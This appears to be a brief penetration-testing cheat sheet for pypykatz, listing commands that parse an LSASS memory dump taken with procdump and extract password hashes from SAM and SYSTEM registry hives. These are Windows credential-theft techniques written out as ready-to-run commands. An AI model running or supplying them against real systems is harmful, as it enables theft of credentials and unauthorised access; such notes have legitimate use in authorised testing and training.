pypykatz

  • dump lsass via procdump

pypykatz lsa minidump lsass.dmp

  • extract hashes from sam/system registry hives pypykatz registry --sam sam.reg system.reg